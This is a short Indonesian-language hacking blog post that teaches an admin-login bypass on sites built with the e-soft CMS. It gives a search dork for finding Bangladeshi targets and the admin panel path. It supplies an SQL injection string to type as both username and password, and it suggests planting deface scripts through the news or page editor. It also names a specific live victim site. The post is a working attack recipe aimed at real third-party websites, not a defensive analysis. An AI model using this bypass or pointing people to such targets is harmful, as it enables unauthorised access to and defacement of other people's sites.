CMS e-soft Webdesign Bypass Admin

Kuy kali ini gw akan share tutorial bypass admin cms e-soft.

Dork:

"/web_admin/" site:bd

Note: Dorknya dikembangin lagi ya!

Exploit:
http://site.bd/web_admin/

#Step by step
1. Cari target dengan dork diatas
2. Masukan exploitnya
3. Login dengan username dan password diisi dengan : '=''or'
bypass admin
4. Kalau vuln akan diarahkan ke admin panelnya , saya belum coba untuk upload shell. Tapi kalau mau masukin script deface , silahkan masuk fitur add page atau edit news atau sejenisnya.

Live target :
http://pegasusshoes.com.bd

Sekian dari saya Handsomeware.
Previous
Next Post »